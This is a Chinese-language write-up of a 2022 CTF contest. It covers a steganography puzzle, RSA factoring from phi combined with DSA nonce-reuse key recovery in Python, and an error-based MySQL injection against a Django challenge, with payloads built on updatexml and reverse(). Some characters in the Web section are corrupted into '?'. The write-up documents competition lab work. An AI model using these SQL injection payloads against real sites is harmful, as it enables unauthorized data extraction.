【Misc】簽名簿

隨便寫點東西提交就行

【Misc】辦公室愛情

doc文檔里面有兩個密碼，白色的password，全選然后改變顏色就行，這是第一段
修改后綴名為zip，打開document.xml就是所有的文字信息，很明顯有兩個password：
拼接起來就是密碼，猜測為wbStego4open隱寫，解密出來一個文件，存著壓縮包密碼
解壓出來是一個pptx文件，彩色的幻燈片，有規律可以發現，可以確定就是七進制轉十進制，最后轉成ascii碼就行。

s='204a213a166a205a234a100a66a226a203a164a203a231a124a203a100a164a45a45a45a236a' for i in s.split('a'):print(chr(int(i,7)),end='')

flag{10ve_exCe1_!!!}

【Crypto】known_phi

給了n和phi，要求出n的分解。
known_phi.py
跑一遍可以得到n的分解，之后dsa求flag

from Crypto.Util.number import inverse, long_to_bytes, bytes_to_long from hashlib import sha256 from math import gcd # from math import isqrt from random import randrange from sage.all import is_prime def factorize_multi_prime(N, phi):prime_factors = set()factors = [N] while len(factors) > 0:# Element to factorize.N = factors[0]w = randrange(2, N - 1)i = 1 while phi % (2 ** i) == 0:sqrt_1 = pow(w, phi // (2 ** i), N) if sqrt_1 > 1 and sqrt_1 != N - 1:# We can remove the element to factorize now, because we have a factorization.factors = factors[1:]p = gcd(N, sqrt_1 + 1)q = N // pif is_prime(p):prime_factors.add(int(p)) elif p > 1:factors.append(int(p))if is_prime(q):prime_factors.add(int(q)) elif q > 1:factors.append(int(q))# Continue in the outer loop breaki += 1return tuple(prime_factors) n = 104228256293611313959676852310116852553951496121352860038971098657350022997841589403091722735802150153734050783858816709247647536393314564077002364012463220999962114186339228164032217361145009468516448617173972835797623658266515762201804936729547278758839604969469770650218191574897316410254695420895895051693 phi = 104228256293611313959676852310116852553951496121352860038971098657350022997837434645707418205268240995284026522165519145773852565112344453740579163420312890001524537570675468046604347184376661743552799809753709321949095844960227307733389258381950812717245522599433727311919405966404418872873961877021696812800 n_factors = factorize_multi_prime(n, phi) q = 24513014442114004234202354110477737650785387286781126308169912007819 s1 = 764450933738974696530033347966845551587903750431946039815672438603 r1 = 8881880595434882344509893789458546908449907797285477983407324325035 r2 = 8881880595434882344509893789458546908449907797285477983407324325035 s2 = 22099482232399385060035569388467035727015978742301259782677969649659 # n_factors = (92128261871628241975522014503893089775204276818952562864868068434189077323911, 112949642503320513342506215562619543574731838853984060837858943255064878544009, 87835491118288540715995802690214012778910595141140880257454164067662889225787, 114034877389817517986186253205403596431234414440955842208884285396147740113161) import itertools for i in itertools.permutations([0,1,2,3]):m1 = long_to_bytes(n_factors[i[0]] + n_factors[i[1]])m2 = long_to_bytes(n_factors[i[2]] + n_factors[i[3]])hm1 = bytes_to_long(sha256(m1).digest())hm2 = bytes_to_long(sha256(m2).digest())k = inverse((s1-s2),q)*(hm1-hm2) % qx1 = (s1*k-hm1)*inverse(r1,q) % qx2 = (s2*k-hm2)*inverse(r2,q) % qif b'flag' in long_to_bytes(x1):print(long_to_bytes(x1))

flag{ea16de7-1981-11ed-b58f}

【Web】djangogogo

打開題?點擊submit

對name參數進?sql注?測試

sql語句報錯了，存在sql注?
查看報錯信息

(1064, "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' FROM `Bill`.`purchase_date`))' at line 1")

后?的語句是

' FROM `Bill`.`purchase_date`))

嘗試拼接

name=year from 1))--

回顯正常，拼接成功
直接訪問 name=month 給了提?

意思就是表名是flag，?概猜測字段也是flag
測試

year from (select flag from flag)))--

回顯正常
sql有報錯，所以直接使?報錯注?了

month from (select updatexml(1, concat(1,(select flag from flag),1),1))))--

只看到了?半flag，回顯有?短限制
逆向輸出?下就好了

month from (select updatexml(1, concat(1,(select reverse(flag) from flag),1),1))))--

總結

以上是生活随笔為你收集整理的[ CTF ]【天格】战队WriteUp-2022年第二届“长城杯”网络安全大赛的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。